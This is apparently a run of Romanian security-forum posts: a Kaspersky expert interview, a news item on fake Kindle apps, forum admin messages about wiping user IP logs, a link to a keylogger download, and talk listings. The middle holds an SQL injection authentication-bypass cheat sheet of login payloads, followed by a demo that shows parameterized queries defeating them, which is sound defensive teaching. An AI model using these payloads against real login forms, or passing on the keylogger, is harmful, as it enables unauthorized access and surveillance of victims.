How do I properly uninstall Kaspersky Lab’s products so no garbage is left in the system and registry?
Alex Gostev: The “proper” way is to use the standard uninstaller. Should anything go wrong and the result is not satisfactory, use the dedicated removal tool: Removal tool for Kaspersky Lab products

How can I get rid of my paranoia and obsession that there is a Trojan in the system, or a vulnerability is being exploited?
Alex Gostev: Why would you want to get rid of it? When it comes to IT security paranoia is actually a positive thing, as it makes you more careful about what you do and how you do it. It makes you try to figure out how the system works, promotes your self-development and broadens your outlook. In other words, it’s a good thing.

At work, I often have to compile all types of DLL files. Security software pretty often reports them as being potentially dangerous, even after I block heuristic analysis. What can I do other than adding exclusion rules into the work directory?
Alex Gostev: I can’t give recommendations unless I have a complete understanding of which files you use, which functions you use, what type of warnings your security software gives, what it specifically reports etc. If you are totally sure that your files are clean (beware though, there may be surprises, e.g. check out the history of the Induc virus), then go ahead and add them to the exclusion rules and contact your security provider’s support line and let them find out what the reasons are for the false positives.

How safe is it to use cloud-based storage? Do you know of any cases where the cloud has been infected?
Alex Gostev: Ah, this is a major topic. There was a recent newspaper publication about this in which I feature. Unfortunately, it’s only in Russian. For those of you who know Russian, check it out here: Business Guide (67091)
Can you please tell us about how Kaspersky’s Virus Encyclopedia documentation is created.
Alex Gostev: These days, 99% of the malware descriptions in Kaspersky’s Virus Encyclopedia have been created by a robot using standard templates and based on automatic analysis of files. Several thousand old descriptions also exist that were written by humans (yes, there used to be time when a new dedicated description could be created for each new virus). Several hundred of them were created specifically by me.

The management of one large company says that Kaspersky Lab writes viruses and creates zombie networks to infect computers in the Russian segment of the Internet, in order to sell more of their products and provide consulting services. Can you please comment on this. I can’t disclose the name of the company as I work for it.
Alex Gostev: I recommend you change your employer. If your management has such a mindset, you never know what they’ll come up with next.

Can you dispel the myth that working in IT security is the preserve of men. It would be great if you could also provide some supporting facts.
Alex Gostev: This is in fact not a myth, but the current reality. Men do indeed make up the majority of experts in this field. Having said that, there are women who work in IT security, and all of them demonstrate a greater professionalism than most men working in this area. In my private view, a woman working in IT security has to demonstrate a very high level of professionalism. All the women I know who work in this sphere, are very good specialists, but there are so few of them. Furthermore, they are so well known in their profession (especially in Russia) that no proof is really necessary.

What can you say about the antivirus that is incorporated in Windows 8? This takes away quite a bit business from the security software manufacturers. How would you comment on this?
Alex Gostev: It’s been quite a while since it was incorporated, and quite a while since it’s been “taking away business”. The thing is, it never did in fact take any business. The simple fact is that in order to develop successful security solutions, a company needs to specialize in developing those solutions. That must be their core business. That cannot be said of Microsoft.

My friends say Kaspersky Anti-Virus is a resource-hungry monster, and recommend that I use free antivirus solutions (I won’t advertise them here). Their argument is: free antivirus is no worse, in fact they are better in many respects. Is this correct?
Alex Gostev: No, and I can’t be bothered disproving it here. I personally would never use a free antivirus, even if I didn’t work for Kaspersky Lab. I know how this type of software works, who works on these programs and how.

Which antivirus manufacturers do you feel most envious of? Would you agree to work for them if they paid you enough?
Alex Gostev: Well, I’m not envious of anyone. There are companies that I have respect for – these are primarily the companies that can make good use of the resources they have, both human and technical, where the work of the specialists makes me say: “How the hell did they find this before us or do a better job of analyzing than us!” This really stimulates competition, and, as a consequence, our level of expertise improves as well. In recent times, I’ve only seen this sort of interesting, motivating competition between us and Symantec. To be more precise, between Kaspersky’s team of experts (GReAT) and their STAR team. That said, we cooperate very closely with them on a number of research topics, and have good personal relationships with them. As for working for a different antivirus company – well, I think I’ve become too much of a Kaspersky man. I’d be more likely to change the IT security sphere for a different, but related area. Or set up my own business.
How do you attract clever students and specialists to your company? Is there a chance they will later be recruited by secret services (foreign or Russian)? Or is this the first time you’ve heard about this?
Alex Gostev: How we attract new employees is a business secret :) As for being recruited by secret services, I didn’t in fact understand that one. Secret services can recruit anyone – taxi drivers, bakers, managers (ourselves not excluded), so what? Kaspersky Lab has its own security service, and it does a great job. This question is within their competence.

When I was reverse engineering one of your products, namely Kaspersky CRYSTAL v12.0.1.288, I discovered the following comment:
//I am not responsible for this code
//I was forced to write it against my will
This is an Easter egg, right?
Alex Gostev: When programs get compiled, the comments existing in the source code do not enter the final code – every programmer knows this. So you could not have obtained that by reverse engineering. Read about the prehistory of that case: polls - What is the best comment in source code you have ever encountered? - Stack Overflow

Is a hardware firewall in the router enough? Or maybe, besides that, it's good to have a software firewall?
Alex Gostev: The firewalls in modern routers are pretty limited in terms of their functionality, and perform primitive filtering at the level of port addresses. Naturally, this solution is not adequate for complete security.

I want to ask about security in Linux. How does Kaspersky Lab approach this system from a security aspect? Do you study the number and geography of threats for Linux. Do such threats evolve in any way, and are they really dangerous? Linux users are convinced that they are secure, and malware does not pose any threat to them. You can read tons of comments like "I've got Linux, I'm secure". What do you think about this?
Alex Gostev: There are far fewer attacks against Linux than Windows or even OS X, for that matter.
The user base isn’t as large as Windows and so the target isn’t as attractive for attackers. There are vulnerabilities and other threats for Linux systems and have been since the beginning, but malware isn’t a major issue on Linux.

Recently, I read that Android is the most unsafe mobile operating system. Do you agree? Which mobile OS is, in your opinion, the most secure?
Alex Gostev: Yes, I agree that Android is the most vulnerable mobile platform. The safest is iOS.

Stuxnet, Duqu, Flame and the latest Gauss have infected millions of computers, spying on their activities without the user realizing it. How is it possible that, despite the improvements antivirus products constantly make in detecting and blocking malware based on the behavior of executable files, Stuxnet and co. have not been noticed and detected? For example the spread via USB flash drive by autorun.inf using the CVE-2010-2568 vulnerability in the *.LNK file, or sending data to a remote server - how is this possible? What does Kaspersky Lab plan to do to fight cyber-espionage? What will be the next Gauss?
Alex Gostev: First of all, the Duqu, Flame and Gauss incidents do not involve millions of computers – at most they affected thousands. In fact, Duqu and miniFlame only affected a few dozen computers. Second, we’re talking about programs that cost millions and that had input from dozens of people. These are not typical cyber threats – they are cutting-edge, complex threats. Obviously, learning how to reliably detect and block them takes time. It should be noted here that KL was the first company to detect and carry out in-depth analysis of them. We are the best in the world at detecting these sorts of threats – and that’s a fact. We’ll use the knowledge we’ve gained to seek out other similar threats.

Why does Kaspersky slow my PC down so much?
Alex Gostev: A good level of protection will always require some use of computer resources.
There are software products out there that call themselves antivirus solutions and which operate faster than our product, but the level of protection they provide is nowhere near that offered by Kaspersky Lab. We don’t see the point of lowering the level of protection, because just one missed virus out of millions detected can cause a user major problems. We are constantly working on new technologies that will allow us to depart from older protection methods, such as the multi-level scanning of files. These technologies will use less computer resources, but also ensure the highest level of protection is maintained.

What is the role of Cloud Protection in Kaspersky’s 2012 product versions? What are the pros besides the basic protection?
Alex Gostev: The reaction time of the cloud to new threats is generally several times greater than that offered by traditional signature databases. Cloud protection is intended primarily to prevent the user being affected by the very latest threats.

Your antivirus is useful against viruses and Trojans whose signatures are already known and the code is already recognized as malicious. What about “hand made” viruses with hidden code?
Alex Gostev: Signature-based analysis is a tried-and-tested method of detecting threats, but on its own against today’s threats it’s virtually useless. That’s why our product uses behavioral analyzers capable of determining whether a program is behaving itself or not.

When installing Kaspersky Anti-Virus together with another antivirus solution, why does Kaspersky tell you to remove them, but they don’t say anything about Kaspersky? I found this rather strange.
Alex Gostev: To ensure a high level of protection and avoid any conflict with other programs, we recommend users uninstall all other antivirus products before installing our product. It is technically possible to have two or three antivirus solutions on one machine, but it will mean the computer is overloaded and will slow it down considerably.
Why don’t you contact rutracker.org and tell them to stop distributing your products?
Alex Gostev: Let them carry on – we don’t mind :)

Is Kaspersky Mobile Security good enough to protect my Android phone? Also, why are there different prices for KMS on Google Play and on kaspersky.com sites?
Alex Gostev: Kaspersky Mobile Security is one of the best mobile AVs (and this is not just our opinion, PPCSL, AV-Test and other independent test agencies say the same). So, in answer to your first question, yes, it is. There are some differences between the update speeds on the GPlay and Kaspersky Lab websites and the tech support terms are also different (on GPlay you can get only limited support via email).

When will a control plug-in for browsers be implemented in KAV or KIS?
Alex Gostev: Is it really necessary? It’s much easier and more effective to open the product and make all the necessary changes there. If you’re talking about tuning the product settings, it is more effective to make all the necessary changes there. Also, we need to isolate our UI settings from malware and other processes to ensure the protection level.

Today we download loads of free apps to our gadgets. Can the attacker take advantage and disguise them as Trojans to compromise our systems and break into other remote targets?
Alex Gostev: There are indeed lots of Android Trojans spreading not only in the guise of legitimate apps but also embedded by malicious users in popular programs. To do this they create their own modifications of the original app package where the Trojan module is added. Here are some recent examples of this:
Fake Android game apps sneak malware into Google Play - Technology & science - Security | NBC News
Over 60% of Android Malware Hides in Fake Popular Apps
and it’s also worth reading our report on mobile malware in 2012.

Source: Interview with Kaspersky Chief Malware Expert Alex Gostev | threatpost
-
[h=1]Kaspersky Warns of Malware Targeting Kindle Fire[/h]
By Jeff Goldman | December 24, 2012

Kaspersky's Roel Schouwenberg recently came across two fake apps in the Amazon App Store, "Internet Accelerator Speed Up" and "Shake Battery Charger," which claim to offer performance improvements, but don't do anything except deliver Airpush mobile ads.

"It should come as no surprise that there are malicious apps in the Amazon App Store," Schouwenberg writes. "Amazon.com is incredibly popular and it's a very trivial step to also upload an app into their store. We detect these pieces of malware as HEUR:Hoax.AndroidOS.FakeBapp.a and have been in contact with Amazon.com about this. The apps were previously available in Google Play as well, but had been removed at an earlier time."

"After a bit of online research, Schouwenberg found a Twitter account [matching the developer's name], and discovered that references in the app code to 'Bapplz' match references in the social feed," Infosecurity reports. "That in turn [led] to the discovery of a website called bapplz.com that hasn’t been updated since August. 'Clearly, the project seems abandoned even if it's still making the author some money,' he noted."

Source: Kaspersky Warns of Malware Targeting Kindle Fire - eSecurity Planet
-
[h=2]SQL Injection Authentication Bypass Cheat Sheet[/h]
This list can be used by penetration testers when testing for SQL injection authentication bypass. A penetration tester can use it manually or through Burp in order to automate the process. The creator of this list is Dr. Emin İslam Tatlı (OWASP Board Member). If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Source: SQL Injection Authentication Bypass Cheat Sheet
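Why the strings in the cheat sheet above get past a login query built by string concatenation, and why a bound parameter rejects every one of them, shown as an added example that is not part of the original post. The `users` table, the function names, the sample accounts and the SQLite dialect are assumptions made for the demo.

```python
import hashlib
import hmac
import sqlite3

# Username-field strings copied from the cheat sheet above.
PAYLOADS = [
    "admin' --",
    "admin' #",               # '#' starts a comment in MySQL, not in SQLite
    "admin'/*",
    "admin' or '1'='1",
    "admin' or 1=1--",
    "admin') or ('1'='1'--",  # only fits a query that wraps the value in (...)
    'admin" --',              # only fits a query that quotes with "..."
]


def pw_hash(password):
    # Simplified so the demo stays about query construction;
    # production code should store a salted KDF output (scrypt, Argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory users table holding two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", pw_hash("correct horse")), ("alice", pw_hash("battery staple"))],
    )
    return db


def login_vulnerable(db, username, password):
    """Legacy pattern: the form values are pasted into the SQL text."""
    sql = (
        "SELECT username FROM users "
        "WHERE username = '%s' AND pw_hash = '%s'" % (username, pw_hash(password))
    )
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # The payload broke the statement for this dialect. No login, but a
        # syntax error raised by a login form is worth alerting on.
        return None
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Bound parameter: the username is data and never parsed as SQL."""
    row = db.execute(
        "SELECT username, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    # Constant-time comparison of the stored and the computed hash.
    if hmac.compare_digest(row[1], pw_hash(password)):
        return row[0]
    return None


def compare(db, payloads, password="not-the-password"):
    """Map each payload to (vulnerable result, parameterized result)."""
    return {
        p: (login_vulnerable(db, p, password), login_parameterized(db, p, password))
        for p in payloads
    }


if __name__ == "__main__":
    for payload, (vuln, safe) in compare(make_db(), PAYLOADS).items():
        print(f"{payload!r:28} vulnerable={vuln!r:8} parameterized={safe!r}")
```

The strings that return nothing against the concatenated query are written for a different quoting style or SQL dialect, so one failed string says nothing about whether a query is safe; only the bound parameter removes the whole class.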
-
Hi tex,

A long time has passed, I have heard many opinions and I still don't know for sure what happened, but I think the judicial system in Romania should be radically changed, because we all know it is in ruins. I'm sorry you spent Christmas like this, but I'm sure it will be fine because you are not at fault in any way. It's sad that the "militia" doesn't tell the difference between a hosting provider and one of its clients...

It was a blow for everyone, maybe because of the elections, maybe because the end of the year is coming and maybe a line had to be drawn, we have no way of knowing, but what is certain is that mistakes were made. I didn't want to get too involved because, honestly, I'm a little afraid, especially since I reopened RST to do some good for the whole community and to show them that we don't give up, but being an administrator of the "RST organized group" I have my reasons to be afraid.

The point is that we are with you and that I'm sure everything will turn out fine, I just hope things don't keep getting postponed, as I understand has happened in many cases.

// Nytro
-
Christmas presents:
Super-moderators:
- Cheater
- M2G
Administrators:
- begood
- em
-
Fuck, if we left the IP 1.3.3.7 for everyone, login problems showed up. So we go with the crude approach:
$_SERVER['REMOTE_ADDR'] = (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254);
-
So that all the paranoid ones can rest easy, meaning those who think they are important even though nobody gives two cents about what they did (or didn't do), over these holidays, between Christmas and New Year's Eve, no IPs will be saved:

mysql> update post set ipaddress = '1.3.3.7';
Query OK, 390557 rows affected (18.36 sec)
Rows matched: 390562 Changed: 390557 Warnings: 0

mysql> update user set ipaddress = '1.3.3.7';
Query OK, 99168 rows affected (1.55 sec)
Rows matched: 99169 Changed: 99168 Warnings: 0

After New Year's Eve, if you keep talking shit about who knows what you have done, learn to use Tor, VPNs or anything else. Screw you. I mean, Merry Christmas.
-
Digital Keylogger v4.0.zip - Speedy Share - upload your files here
-
So what the fuck are you guys doing?
-
Effective Approaches To Web Application Security
Description:
Abstract
This presentation will focus on new and interesting approaches to web application security problems posed by a continuous deployment environment. Specifically, this presentation will cover useful security systems such as automatic vulnerability and application fault detection, effective platform defenses for XSS/SQLi, practical security alerting mechanisms, and visualizations of security related data. This talk demonstrates how to create these systems using free tools that improve security posture without commercial security products.
*****
Speaker: Zane Lackey, Security Engineer Manager, Etsy
Zane Lackey leads the security groups at Etsy, the world’s marketplace of creative independent businesses. Prior to Etsy, Zane was a Senior Security Consultant at iSEC Partners with a focus in the fields of mobile and web application security. His research has been featured in notable media outlets such as the BBC, Associated Press, Forbes, Wired, CNET, SC Magazine and numerous others. A frequent speaker at top industry conferences, he has presented at BlackHat, RSA, Microsoft BlueHat, Toorcon, DeepSec, SANS, OWASP, guest lectured at NYU, and in 2010 was named as one of 12 prominent security researchers by Network World magazine. He is a contributing author of Mobile Application Security (McGraw-Hill), a co-author of Hacking Exposed: Web 2.0 (McGraw-Hill), and a contributing author/technical editor of Hacking VoIP (No Starch Press). He holds a Bachelor of Arts in Economics with a minor in Computer Science from the University of California, Davis.
*****
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Original Source: Effective Approaches to Web Application Security - Zane Lackey on Vimeo
Source: Effective Approaches To Web Application Security
-
Cyberspace And Beyond - Evolution In Action
Description:
PDF : - https://hacktivity.com/en/downloads/archives/221/
Sir David Pepper was the Director of the Government Communications Headquarters (GCHQ) – the UK Government’s agency responsible for Signals Intelligence and electronic information security. He retired in July 2008, having taken up that post in April 2003. After taking a degree in Physics and a DPhil in Theoretical Physics at St John’s College, Oxford, he joined GCHQ in 1972. He spent all his career there except for a spell in the Home Office in 1998-2000, where he was responsible for infrastructure and modernisation. Much of his time at GCHQ was spent managing intelligence production, but he also had spells as Finance Director and HR Director. As the Director, his focus was on leading transformational change, as GCHQ responded to the challenges of the Internet both in intelligence production and in meeting the new problems of cyber-security. Since retiring from GCHQ, he has been a member of the previous UK Government’s National Security Forum, and held other non-executive positions including a role with Gloucestershire County Council. He is currently a member of the Advisory Board of Thales UK, and works with Deloitte on cyber risk and national security issues.
Original Source:
Source: Cyberspace And Beyond - Evolution In Action